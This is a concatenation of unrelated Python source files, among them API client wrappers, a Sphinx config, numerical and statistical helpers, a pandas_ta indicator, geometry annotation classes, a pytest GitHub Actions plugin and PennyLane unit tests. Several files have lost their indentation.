consumer_secret=client_params['consumer_secret'])
# Load optional parameters.
optional_params = [
'callback_url',
'scheme',
'request_token_url',
'access_token_url',
'authorization_url',
'api_path',
'email',
'password',
'timeout']
for param in optional_params:
try:
prop = param
# Prefix private properties with '_'.
if prop in ['email', 'password']:
prop = '_%s' % prop
client.__dict__[prop] = cp.get(env, param)
except ConfigParser.NoOptionError:
pass
return client
# The exposed API has moved to using Client instead of OX3APIClient, but create
# a temporary alias for backwards compatibility.
OX3APIClient = Client
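# Minimal usage sketch (illustrative only; the domain, credentials and endpoint
# path below are placeholders, not values from this module):
#
#   client = Client(domain='ui.example.com', realm=None,
#                   consumer_key='KEY', consumer_secret='SECRET',
#                   email='user@example.com', password='password')
#   client.logon()
#   accounts = client.get('/account')   # hypothetical API shorthand
#   client.logoff()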
|
#!/usr/bin/python3
import tensorflow as tf
from tensorflow.python.platform import gfile
from google.protobuf import text_format
import sys
def convert_pbtxt_to_pb(filename):
with tf.gfile.FastGFile(filename, 'r') as f:
graph_def = tf.GraphDef()
file_content = f.read()
# Merges the human-readable string in `file_content` into `graph_def`.
text_format.Merge(file_content, graph_def)
tmp=filename.split('.')
outname=tmp[0]+".pb"
tf.train.write_graph( graph_def , './' , outname , as_text = False )
if len(sys.argv) < 2:
    print("usage: python3 pbtxt2pb.py xxx.pbtxt")
    sys.exit(1)
fname = sys.argv[1]
convert_pbtxt_to_pb(fname)
|
# -*- coding: utf-8 -*-
import os
import sys
sys.path.insert(0, os.path.abspath(".."))
# -- General configuration ------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.intersphinx",
"sphinx.ext.napoleon",
"sphinx.ext.todo",
]
# TODO: Please Read!
# Uncomment the below if you use native CircuitPython modules such as
# digitalio, micropython and busio. List the modules you use. Without it, the
# autodoc module docs will fail to generate with a warning.
autodoc_mock_imports = ["digitalio", "busio", "adafruit_bus_device", "micropython"]
intersphinx_mapping = {
"python": ("https://docs.python.org/3.4", None),
"BusDevice": (
"https://circuitpython.readthedocs.io/projects/busdevice/en/latest/",
None,
),
"CircuitPython": ("https://circuitpython.readthedocs.io/en/latest/", None),
}
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
source_suffix = ".rst"
# The master toctree document.
master_doc = "index"
# General information about the project.
project = "Adafruit PN532 Library"
copyright = "2018 ladyada"
author = "ladyada"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = "1.0"
# The full version, including alpha/beta/rc tags.
release = "1.0"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# These patterns also affect html_static_path and html_extra_path
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store", ".env", "CODE_OF_CONDUCT.md"]
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
default_role = "any"
# If true, '()' will be appended to :func: etc. cross-reference text.
#
add_function_parentheses = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# If this is True, todo emits a warning for each TODO entry. The default is False.
todo_emit_warnings = True
napoleon_numpy_docstring = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
on_rtd = os.environ.get("READTHEDOCS", None) == "True"
if not on_rtd: # only import and set the theme if we're building docs locally
try:
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path(), "."]
except:
html_theme = "default"
html_theme_path = ["."]
else:
html_theme_path = ["."]
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
html_favicon = "_static/favicon.ico"
# Output file base name for HTML help builder.
htmlhelp_basename = "AdafruitPn532Librarydoc"
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
master_doc,
"AdafruitPN532Library.tex",
"AdafruitPN532 Library Documentation",
author,
"manual",
),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(
master_doc,
"AdafruitPN532library",
"Adafruit PN532 Library Documentation",
[author],
1,
)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"AdafruitPN532Library",
"Adafruit PN532 Library Documentation",
author,
"AdafruitPN532Library",
"One line description of project.",
"Miscellaneous",
),
]
|
import datetime as dt
from library.ftx.base import BaseApiClass
class LeveragedTokens(BaseApiClass):
"""docstring for LeveragedTokens."""
def __init__(self, api_key: str, secret_key: str, subaccount_name: str = ''):
super().__init__(api_key, secret_key, subaccount_name)
def list_leveraged_tokens(self):
""" https://docs.ftx.com/#list-leveraged-tokens """
return self.get('/api/lt/tokens', authentication_required=False)
def get_token_info(self, token_name: str):
""" https://docs.ftx.com/#get-token-info """
return self.get(f'/api/lt/{token_name}', authentication_required=False)
def get_leveraged_token_balances(self):
""" https://docs.ftx.com/#get-leveraged-token-balances """
return self.get(f'/api/lt/balances')
def list_leveraged_token_creation_requests(self):
""" https://docs.ftx.com/#list-leveraged-token-creation-requests """
return self.get(f'/api/lt/creations')
def request_leveraged_token_creation(self, token_name: str, size: float):
""" https://docs.ftx.com/#request-leveraged-token-creation """
return self.post(f'/api/lt/{token_name}/create', data={'size': size})
def list_leveraged_token_redemption_requests(self):
""" https://docs.ftx.com/#list-leveraged-token-redemption-requests """
return self.get(f'/api/lt/redemptions')
def request_leveraged_token_redemption(self, token_name: str, size: float):
""" https://docs.ftx.com/#request-leveraged-token-redemption """
return self.post(f'/api/lt/{token_name}/redeem', data={'size': size})
def request_etf_rebalance_info(self):
""" https://docs.ftx.com/#request-etf-rebalance-info """
return self.get(f'/api/etfs/rebalance_info')
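# Minimal usage sketch (illustrative only; the credentials and token name are
# placeholders, and BaseApiClass is assumed to provide get()/post() plus request
# signing):
#
#   lt = LeveragedTokens(api_key='KEY', secret_key='SECRET')
#   tokens = lt.list_leveraged_tokens()
#   info = lt.get_token_info('BULL')    # hypothetical token name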
|
from package import redact_ex
from package import solve_implicit_ode
import numpy as np
EXERCISE_05 = """\
Make a program that is able to graphically solve the previous equation
using the fully implicit FTCS scheme.\
"""
redact_ex(EXERCISE_05, 5)
slices = 20
itern = 1000
plot_frequency = 0.05
deltat = 1e-3
deltax = 1e-1
alpha = 1
s = alpha*deltat/deltax**2
amat = np.diag([1]+[1+2*s]*(slices-1)+[1]) \
+ np.diag([0]+[ -s]*(slices-1)+[ ], k = 1) \
+ np.diag([ ]+[ -s]*(slices-1)+[0], k = -1)
iamat = np.linalg.inv(amat)
iden = np.identity(len(amat))
def iftcs_boundary_conditions(lap, ciarr):
slices = len(ciarr)-1
ciarr[0] = 0; ciarr[slices] = 10
return ciarr
tprev = np.zeros(slices+1); tpprev = np.zeros(slices+1)
tprev[0] = 0; tpprev[0] = 0
tprev[slices] = 10; tpprev[slices] = 10
initial_conditions = [tprev, tpprev]
print("Computing...", end='\n\n')
solve_implicit_ode(iamat, iden, initial_conditions, iftcs_boundary_conditions,
slices, itern, plot_frequency)
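# For reference, one fully implicit step amounts to solving A t_new = t_old, i.e.
# t_new = A^{-1} t_old, with the boundary values re-imposed afterwards. A sketch
# (solve_implicit_ode above is assumed to do the equivalent internally, plus plotting):
#
#   t_new = iamat @ tprev
#   t_new = iftcs_boundary_conditions(None, t_new)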
|
import numpy as np
def to_binary(n, dim):
"""
Obtains the binary representation of an integer.
args:
n: The integer to be converted to binary. The integer shouldn't
be so large that more than dim(the next arg) bits are required
to encode it.
dim: The dimension of the array that is
going to contain the binary representation.
"""
raw = np.zeros(dim)
temp = n%(2**dim)
indx = 0
while temp > 0:
raw[indx] = temp % 2
temp = int(temp / 2)
indx = indx + 1
return raw
class GenBase():
"""
Represents an integer in a base system where the bases are not constant, but given by an array.
For example, a binary base system has bases equal to 2 while decimal has all bases equal to 10.
But what if the "units" digit had a base 3 (could take values 0,1,2) and the "tens" digit had a
base 4 (could take values 0,1,2,3) and so on.
"""
def __init__(self, base_vals):
"""
        Instantiates an instance of the GenBase class.
args:
base_vals: The values of the bases given by an array.
"""
self.bases = base_vals
self.arr_vals = np.zeros(len(base_vals))
def add_one(self):
"""
Whatever the integer value of the instance of this class currently is, add one to it.
TODO: If an integer is greater than the maximum allowable per the array, modulo it
with max permissible value.
"""
self.arr_vals[0] += 1
i = 0
        while self.arr_vals[i] >= self.bases[i]:
self.arr_vals[i] = 0
self.arr_vals[i+1] += 1
i+=1
def add_num(self,no):
"""
Whatever the integer value of the instance of this class currently is,
add an integer, no to it.
args:
no: The number to add.
"""
for _ in range(no):
self.add_one()
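# Illustrative self-check (not part of the original module): to_binary returns the
# bits of an integer in little-endian order, and a GenBase counter carries a digit
# once it reaches its base.
if __name__ == "__main__":
    print(to_binary(6, 4))              # expected: [0. 1. 1. 0.]
    counter = GenBase(np.array([3, 4]))
    counter.add_num(4)                  # 4 = 1*3 + 1 in this mixed-radix system
    print(counter.arr_vals)             # expected: [1. 1.]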
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/parallels/catkin_ws/devel/.private/ar_track_alvar_msgs/include".split(';') if "/home/parallels/catkin_ws/devel/.private/ar_track_alvar_msgs/include" != "" else []
PROJECT_CATKIN_DEPENDS = "message_runtime;std_msgs;geometry_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "ar_track_alvar_msgs"
PROJECT_SPACE_DIR = "/home/parallels/catkin_ws/devel/.private/ar_track_alvar_msgs"
PROJECT_VERSION = "0.7.0"
|
# -*- coding: utf-8 -*-
from pandas import DataFrame
from .roc import roc
from pandas_ta.utils import get_drift, get_offset, verify_series
def kst(close, roc1=None, roc2=None, roc3=None, roc4=None, sma1=None, sma2=None, sma3=None, sma4=None, signal=None, drift=None, offset=None, **kwargs):
"""Indicator: 'Know Sure Thing' (KST)"""
# Validate arguments
roc1 = int(roc1) if roc1 and roc1 > 0 else 10
roc2 = int(roc2) if roc2 and roc2 > 0 else 15
roc3 = int(roc3) if roc3 and roc3 > 0 else 20
roc4 = int(roc4) if roc4 and roc4 > 0 else 30
sma1 = int(sma1) if sma1 and sma1 > 0 else 10
sma2 = int(sma2) if sma2 and sma2 > 0 else 10
sma3 = int(sma3) if sma3 and sma3 > 0 else 10
sma4 = int(sma4) if sma4 and sma4 > 0 else 15
signal = int(signal) if signal and signal > 0 else 9
_length = max(roc1, roc2, roc3, roc4, sma1, sma2, sma3, sma4, signal)
close = verify_series(close, _length)
drift = get_drift(drift)
offset = get_offset(offset)
if close is None: return
# Calculate Result
rocma1 = roc(close, roc1).rolling(sma1).mean()
rocma2 = roc(close, roc2).rolling(sma2).mean()
rocma3 = roc(close, roc3).rolling(sma3).mean()
rocma4 = roc(close, roc4).rolling(sma4).mean()
kst = 100 * (rocma1 + 2 * rocma2 + 3 * rocma3 + 4 * rocma4)
kst_signal = kst.rolling(signal).mean()
# Offset
if offset != 0:
kst = kst.shift(offset)
kst_signal = kst_signal.shift(offset)
# Handle fills
if "fillna" in kwargs:
kst.fillna(kwargs["fillna"], inplace=True)
kst_signal.fillna(kwargs["fillna"], inplace=True)
if "fill_method" in kwargs:
kst.fillna(method=kwargs["fill_method"], inplace=True)
kst_signal.fillna(method=kwargs["fill_method"], inplace=True)
# Name and Categorize it
kst.name = f"KST_{roc1}_{roc2}_{roc3}_{roc4}_{sma1}_{sma2}_{sma3}_{sma4}"
kst_signal.name = f"KSTs_{signal}"
kst.category = kst_signal.category = "momentum"
# Prepare DataFrame to return
data = {kst.name: kst, kst_signal.name: kst_signal}
kstdf = DataFrame(data)
kstdf.name = f"KST_{roc1}_{roc2}_{roc3}_{roc4}_{sma1}_{sma2}_{sma3}_{sma4}_{signal}"
kstdf.category = "momentum"
return kstdf
kst.__doc__ = \
"""'Know Sure Thing' (KST)
The 'Know Sure Thing' is a momentum based oscillator and based on ROC.
Sources:
https://www.tradingview.com/wiki/Know_Sure_Thing_(KST)
https://www.incrediblecharts.com/indicators/kst.php
Calculation:
Default Inputs:
roc1=10, roc2=15, roc3=20, roc4=30,
sma1=10, sma2=10, sma3=10, sma4=15, signal=9, drift=1
ROC = Rate of Change
SMA = Simple Moving Average
rocsma1 = SMA(ROC(close, roc1), sma1)
rocsma2 = SMA(ROC(close, roc2), sma2)
rocsma3 = SMA(ROC(close, roc3), sma3)
rocsma4 = SMA(ROC(close, roc4), sma4)
KST = 100 * (rocsma1 + 2 * rocsma2 + 3 * rocsma3 + 4 * rocsma4)
KST_Signal = SMA(KST, signal)
Args:
close (pd.Series): Series of 'close's
roc1 (int): ROC 1 period. Default: 10
roc2 (int): ROC 2 period. Default: 15
roc3 (int): ROC 3 period. Default: 20
roc4 (int): ROC 4 period. Default: 30
sma1 (int): SMA 1 period. Default: 10
sma2 (int): SMA 2 period. Default: 10
sma3 (int): SMA 3 period. Default: 10
sma4 (int): SMA 4 period. Default: 15
    signal (int): Its period. Default: 9
drift (int): The difference period. Default: 1
offset (int): How many periods to offset the result. Default: 0
Kwargs:
fillna (value, optional): pd.DataFrame.fillna(value)
fill_method (value, optional): Type of fill method
Returns:
pd.DataFrame: kst and kst_signal columns
"""
|
import math as m
import numpy as np
from src.continuous.uniform import UniformDist
from src.prob_distribution import ProbDist
from src.spaces.spaces1d_leafs import ContinuousSpace
class LogisticDist(ProbDist):
"""Simple Logistic distribution."""
def __init__(self, loc = 0, scale = 1):
"""Creates Logistic(loc,scale) distribution.
:param loc Location of the distribution.
:param scale Scale of the distribution
"""
# save params
self.loc = loc
self.scale = scale
# create generator
self.UG = UniformDist()
super().__init__(ContinuousSpace(-np.inf, np.inf))
def expectation(self):
"""Calculates the expectations for that distribution.
:returns The expectation of the distribution"""
return self.loc
def var(self):
"""Calculates the variance for that distribution.
:returns The variance of the distribution"""
return (m.pi ** 2 / 3) * (self.scale ** 2)
def sample(self, num_samples = 1):
"""Generate random numbers from Logistic(loc, scale) by using acceptance rejection distributions.
:param num_samples How many random numbers should be generated.
:returns Random numbers x ~ Logistic(loc, scale).
"""
# shortcut
loc = self.loc
scale = self.scale
# sample data
U = self.UG.sample(num_samples)
X = np.log(U / (1 - U))
return scale * X + loc
def c_pdf(self, x):
"""This method calculates the density Logistic(loc, scale).
:param x Which value should be evaluated.
:returns The probability that this element occurs.
"""
# shortcut
loc = self.loc
scale = self.scale
# update x
xn = np.subtract(x, loc) / scale
t = np.exp(-xn)
b = (1 + t) ** 2
f = t / b
return f / scale
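# Illustrative sanity check (not part of the original module): for a large sample,
# the empirical mean and variance should approach expectation() and var().
if __name__ == "__main__":
    dist = LogisticDist(loc=2, scale=0.5)
    samples = dist.sample(100000)
    print(np.mean(samples), dist.expectation())   # both near 2
    print(np.var(samples), dist.var())            # both near (pi**2 / 3) * 0.25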
|
"""
Anno values.
General conventions:
- The original marker value from the textual representation is converted to an internal format convenient for algorithms.
The reverse conversion is done by tostring() method. It will return an equivalent representation, which is may differ from
the original one.
- For all markers point test does not include marker's border. For example, a circle with radius of 0 has no points inside.
"""
import abc
import cv2
import numpy as np
class Value:
"""
Base class for marker value.
Derived classes must have the following members:
_image_pose_self: pose of the value.
"""
def __init__(self):
self._a = 0
@staticmethod
def _get_value_as_list(value, expected_length = None):
if type(value) == str:
value = [float(s) for s in value.split()]
if expected_length is not None and len(value) != expected_length:
raise ValueError("Wrong number of values {}, expected {}.".format(len(value), expected_length))
return value
def _make_pose(self, ox, oy, angle):
ca = np.cos(angle)
sa = np.sin(angle)
self._image_pose_self = np.array([[ca, -sa, ox], [sa, ca, oy], [0, 0, 1]], dtype=np.float32)
@property
def image_pose_self(self):
return self._image_pose_self
@property
def o(self):
""" Origin of the coordinate system. """
return self._image_pose_self[:2, 2:].squeeze()
def transform(self, t):
"""
Transform the pose by the matrix t. In other words, the marker is "moved" by the matrix t.
        :param t: 3x3 2d homogeneous transformation matrix.
"""
self._image_pose_self = np.dot(t, self._image_pose_self)
@property
def a(self):
""" Angle """
return self._a
@a.setter
def a(self, value):
self._a = value
self._make_pose(self.x, self.y, self._a)
@property
def ax(self):
""" X-axis of the coordinate system. """
return self._image_pose_self[:2, 0:1].squeeze()
@property
def ay(self):
""" Y-axis of the coordinate system. """
return self._image_pose_self[:2, 1:2].squeeze()
@property
def x(self):
""" X coordinate of the origin. """
return self._image_pose_self[0, 2]
@x.setter
def x(self, value):
self._image_pose_self[0, 2] = value
@property
def y(self):
""" Y coordinate of the origin. """
return self._image_pose_self[1, 2]
@y.setter
def y(self, value):
self._image_pose_self[1, 2] = value
@property
def angle(self):
return np.arctan2(self._image_pose_self[1, 0], self._image_pose_self[0, 0])
@abc.abstractmethod
def tostring(self, pos_precision=2, angle_precision=4):
"""
Convert to textual representation in anno file format.
:param pos_precision: precision for positional parameters (x, y, sizes, etc.)
:param angle_precision: precision for angular parameters.
:return:
"""
return ''
def write_to_marker(self, marker, pos_precision=2, angle_precision=4):
"""
Writes itself to an anno marker object.
:param marker: marker object.
"""
marker["value"] = self.tostring(pos_precision, angle_precision)
def __str__(self):
return self.tostring()
def _transform_points(self, t, points):
"""
Apply a transform on points.
        :param t: a 3x3 homogeneous 2d transform matrix.
:param points: a point or an array of points in rows.
:return: a point or an array of transformed points in rows.
"""
p = np.array(points, dtype=np.float32).reshape(-1, 2)
p = np.concatenate((p, np.ones((p.shape[0], 1), dtype=np.float32)), axis=1)
tp = np.dot(p, t.T) # Change order and transpose because the points are not in columns.
tp = tp[:, :2].reshape(points.shape)
return tp
def from_image(self, image_point):
"""
Transform image point to the coordinate system of the self.
:param image_point point in image coordinates
:return point in self coordinate system.
"""
return self._transform_points(np.linalg.inv(self._image_pose_self), image_point)
def to_image(self, self_point):
"""
Transform point(s) in own coordinate system to a point in the image coordinate system.
:param self_point point or array of points in rows in own coordinate system.
:return point or array of points in rows in image coordinate system.
"""
return self._transform_points(self._image_pose_self, self_point)
def distance_from_o(self, point):
"""
Computes distance between point and origin.
:param point point in image coordinates.
:return unsigned distance from origin.
"""
d = np.linalg.norm(point - self.o)
return d
class RectValue(Value):
""" Rect value.
Origin is at the top left corner.
"""
def __init__(self, value):
Value.__init__(self)
value = Value._get_value_as_list(value, 4)
self._make_pose(
min(value[0], value[2]),
min(value[1], value[3]),
0)
self._sx = abs(value[2] - value[0])
self._sy = abs(value[3] - value[1])
@property
def sx(self):
""" X-size (width)."""
return self._sx
@sx.setter
def sx(self, value):
self._sx = value
@property
def sy(self):
""" Y-size (height)."""
return self._sy
@sy.setter
def sy(self, value):
self._sy = value
@property
def br(self):
""" Bottom-right corner (opposite to the origin)."""
return self.o + np.array([self._sx, self._sy])
def contains(self, point):
"""
Checks if a point is inside the marker.
:param point point in image coordinates
:return True, if the point is inside the marker.
"""
p = self.from_image(point)
result = 0 < p[0] and p[0] < self._sx and 0 < p[1] and p[1] < self._sy
return result
def tostring(self, pos_precision=2, angle_precision=4):
fmt_pos = '{:0.' + str(pos_precision) + 'f}'
return " ".join(map(lambda x: fmt_pos.format(x), [self.x, self.y, self.br[0], self.br[1]]))
class PointValue(Value):
""" Point value. """
def __init__(self, value):
Value.__init__(self)
value = Value._get_value_as_list(value, 2)
self._make_pose(value[0], value[1], 0)
def tostring(self, pos_precision=2, angle_precision=None):
"""
Write marker to string.
:param pos_precision: position precision.
:param angle_precision: not used.
:return:
"""
fmt_pos = '{:0.' + str(pos_precision) + 'f}'
return " ".join(map(lambda x: fmt_pos.format(x), [self.x, self.y]))
class OrientedPointValue(Value):
""" OrientedPoint value. """
def __init__(self, value):
Value.__init__(self)
value = Value._get_value_as_list(value, 3)
self._a = value[2]
self._make_pose(value[0], value[1], value[2])
def tostring(self, pos_precision=2, angle_precision=4):
fmt_pos = '{:0.' + str(pos_precision) + 'f}'
fmt_angle = '{:0.' + str(angle_precision) + 'f}'
return " ".join(map(lambda x: fmt_pos.format(x), [self.x, self.y])) + " " + fmt_angle.format(self.angle)
class OrientedRectValue(Value):
""" OrientedRect value.
    Its origin is in the center of the rectangle.
"""
def __init__(self, value):
"""
Create object.
:param value: [origin_x, origin_y, size_x, size_y, angle]
"""
Value.__init__(self)
value = Value._get_value_as_list(value, 5)
self._a = value[4]
self._make_pose(value[0], value[1], value[4])
self._sx = value[2]
self._sy = value[3]
@property
def sx(self):
""" X-size (width) of the rectangle. """
return self._sx
@sx.setter
def sx(self, value):
self._sx = value
@property
def sy(self):
""" Y-size, (height) of the rectangle. """
return self._sy
@sy.setter
def sy(self, value):
self._sy = value
def contains(self, point):
"""
Checks if a point is inside the marker.
:param point point in image coordinates
:return True, if the point is inside the marker.
"""
p = np.abs(self.from_image(point) * 2)
result = p[0] < self._sx and p[1] < self._sy
return result
def tostring(self, pos_precision=2, angle_precision=4):
fmt_pos = '{:0.' + str(pos_precision) + 'f}'
fmt_angle = '{:0.' + str(angle_precision) + 'f}'
return " ".join(map(lambda x: fmt_pos.format(x), [self.x, self.y, self.sx, self.sy])) + \
" " + fmt_angle.format(self.angle)
class CircleValue(Value):
""" OrientedRect value. """
def __init__(self, value):
Value.__init__(self)
value = Value._get_value_as_list(value, 3)
self._make_pose(value[0], value[1], 0)
self._r = value[2]
@property
def r(self):
""" Radius)."""
return self._r
@r.setter
def r(self, value):
self._r = value
def contains(self, point):
"""
Checks if a point is inside the marker.
:param point point in image coordinates
:return True, if the point is inside the marker.
"""
d = self.distance_from_o(point)
return d < self._r
def tostring(self, pos_precision=2, angle_precision=4):
fmt_pos = '{:0.' + str(pos_precision) + 'f}'
return " ".join(map(lambda x: fmt_pos.format(x), [self.x, self.y, self._r]))
class PolygonValue(Value):
""" Polygon value. """
def __init__(self, value, children=None):
"""
Create a new instance.
:param value: a string or a list of floats for outer contour.
:param children: a list of children (inner contours aka holes):
- strings
- lists of floats
- dictionaries as in anno files: {'value': value}
Internal representation is a list or np.arrays [*, 2] self._poly.
self._poly[0] is the outer contour. The optional rest are children (holes).
"""
Value.__init__(self)
self._poly = [np.array(Value._get_value_as_list(value), dtype=np.float32).reshape(-1, 2)]
if children is not None:
for child in children:
if type(child) == dict:
child_value = child["value"]
else:
child_value = child
child_value = np.array(Value._get_value_as_list(child_value), dtype=np.float32).reshape(-1, 2)
self._poly.append(child_value)
self._bounds = np.array([
np.min(self._poly[0], axis=0),
np.max(self._poly[0], axis=0)],
dtype=np.float32)
self._make_pose(0, 0, 0)
@property
def bounds(self):
"""
Gets bounds of the polygon.
:return: numpy array [[min_x, min_y], [max_x, max_y]].
"""
return self._bounds
def fill(self, image, color):
int_poly = []
for p in self._poly:
int_poly.append(np.round(p).astype(np.int32))
cv2.fillPoly(image, int_poly, color=color)
def contains(self, point):
"""
Checks if a point is inside the marker.
:param point point in image coordinates
:return True, if the point is inside the marker.
"""
point = tuple(point)
if point[0] <= self._bounds[0][0] or point[1] <= self._bounds[0][1]:
return False
if point[0] >= self._bounds[1][0] or point[1] >= self._bounds[1][1]:
return False
if cv2.pointPolygonTest(self._poly[0], point, measureDist=False) <= 0:
return False
for hole in self._poly[1:]:
if cv2.pointPolygonTest(hole, point, measureDist=False) >= 0:
return False
return True
def distance_to_point(self, point):
"""
Measures distance from the border to the point.
:param point point in image coordinates
:return distance. Positive is inside the polygon, negative - outside.
"""
point = tuple(point)
dist = cv2.pointPolygonTest(self._poly[0], point, measureDist=True)
if dist <= 0:
# Point is outside of outer polygon
return dist
for hole in self._poly[1:]:
inner_dist = cv2.pointPolygonTest(hole, point, measureDist=True)
if inner_dist >= 0:
# Point is in the hole
return -inner_dist
dist = min(dist, -inner_dist)
return dist
    def tostring(self, pos_precision=2, angle_precision=4):
"""
Convert to string representation.
:return: Returns a list of strings, the first element corresponds to the outer contour,
the rest to the children.
"""
fmt_pos = '{:0.' + str(pos_precision) + 'f}'
def points_to_string(points):
return " ".join(map(lambda x: fmt_pos.format(x), list(points.ravel())))
strings = list(map(points_to_string, self._poly))
return strings
def write_to_marker(self, marker, pos_precision=2, angle_precision=4):
text = self.tostring(pos_precision, angle_precision)
marker["value"] = text[0]
        if len(text) > 1:
marker["children"] = list(map(lambda x: {"value": x}, text[1:]))
def __str__(self):
return str(self.tostring())
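# A minimal usage sketch (illustrative only, not part of the original module).
# It assumes the Value base class defined earlier in this file sets up the image
# pose via _make_pose and provides from_image/distance_from_o/o as used above.
if __name__ == "__main__":
    rect = RectValue([10, 20, 50, 60])            # axis-aligned rect with origin at (10, 20)
    print(rect.contains(np.array([30, 40])))      # True: point lies inside the rect
    print(rect.contains(np.array([5, 5])))        # False: point lies outside the rect
    circle = CircleValue([0, 0, 5])               # centre (0, 0), radius 5
    print(circle.contains(np.array([3, 3])))      # True: distance ~4.24 < 5
    print(circle.tostring())                      # "0.00 0.00 5.00"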
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
from collections import OrderedDict
# Reference:
# https://docs.pytest.org/en/latest/writing_plugins.html#hookwrapper-executing-around-other-hooks
# https://docs.pytest.org/en/latest/writing_plugins.html#hook-function-ordering-call-example
# https://docs.pytest.org/en/stable/reference.html#pytest.hookspec.pytest_runtest_makereport
#
# Inspired by:
# https://github.com/pytest-dev/pytest/blob/master/src/_pytest/terminal.py
def pytest_runtest_logreport(report):
# enable only in a workflow of GitHub Actions
# ref: https://help.github.com/en/actions/configuring-and-managing-workflows/using-environment-variables#default-environment-variables
if os.environ.get("GITHUB_ACTIONS") != "true":
return
if report.when == "call" and report.failed:
# collect information to be annotated
filesystempath, lineno, _ = report.location
runpath = os.environ.get("PYTEST_RUN_PATH")
if runpath:
filesystempath = os.path.join(runpath, filesystempath)
# try to convert to absolute path in GitHub Actions
workspace = os.environ.get("GITHUB_WORKSPACE")
if workspace:
full_path = os.path.abspath(filesystempath)
try:
rel_path = os.path.relpath(full_path, workspace)
except ValueError:
# os.path.relpath() will raise ValueError on Windows
# when full_path and workspace have different mount points.
# https://github.com/utgwkk/pytest-github-actions-annotate-failures/issues/20
rel_path = filesystempath
if not rel_path.startswith(".."):
filesystempath = rel_path
if lineno is not None:
# 0-index to 1-index
lineno += 1
# get the name of the current failed test, with parametrize info
longrepr = report.head_line or report.nodeid
# get the error message and line number from the actual error
try:
longrepr += "\n\n" + report.longrepr.reprcrash.message
lineno = report.longrepr.reprcrash.lineno
except AttributeError:
pass
print(
_error_workflow_command(filesystempath, lineno, longrepr), file=sys.stderr
)
def _error_workflow_command(filesystempath, lineno, longrepr):
# Build collection of arguments. Ordering is strict for easy testing
details_dict = OrderedDict()
details_dict["file"] = filesystempath
if lineno is not None:
details_dict["line"] = lineno
details = ",".join("{}={}".format(k, v) for k, v in details_dict.items())
if longrepr is None:
return "\n::error {}".format(details)
else:
longrepr = _escape(longrepr)
return "\n::error {}::{}".format(details, longrepr)
def _escape(s):
return s.replace("%", "%25").replace("\r", "%0D").replace("\n", "%0A")
|
# Copyright 2018-2021 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unit tests for tape expansion stopping criteria and expansion functions.
"""
import pytest
import numpy as np
import pennylane as qml
from pennylane.wires import Wires
class TestCreateExpandFn:
"""Test creating expansion functions from stopping criteria."""
crit_0 = (~qml.operation.is_trainable) | (qml.operation.has_gen & qml.operation.is_trainable)
doc_0 = "Test docstring."
with qml.tape.JacobianTape() as tape:
qml.RX(0.2, wires=0)
qml.RY(qml.numpy.array(2.1, requires_grad=True), wires=1)
qml.Rot(*qml.numpy.array([0.5, 0.2, -0.1], requires_grad=True), wires=0)
def test_create_expand_fn(self):
"""Test creation of expand_fn."""
expand_fn = qml.transforms.create_expand_fn(
depth=10,
stop_at=self.crit_0,
docstring=self.doc_0,
)
assert expand_fn.__doc__ == "Test docstring."
def test_create_expand_fn_expansion(self):
"""Test expansion with created expand_fn."""
expand_fn = qml.transforms.create_expand_fn(depth=10, stop_at=self.crit_0)
new_tape = expand_fn(self.tape)
assert new_tape.operations[0] == self.tape.operations[0]
assert new_tape.operations[1] == self.tape.operations[1]
assert [op.name for op in new_tape.operations[2:]] == ["RZ", "RY", "RZ"]
assert np.allclose([op.data for op in new_tape.operations[2:]], [[0.5], [0.2], [-0.1]])
assert [op.wires for op in new_tape.operations[2:]] == [qml.wires.Wires(0)] * 3
def test_create_expand_fn_dont_expand(self):
"""Test expansion is skipped with depth=0."""
expand_fn = qml.transforms.create_expand_fn(depth=0, stop_at=self.crit_0)
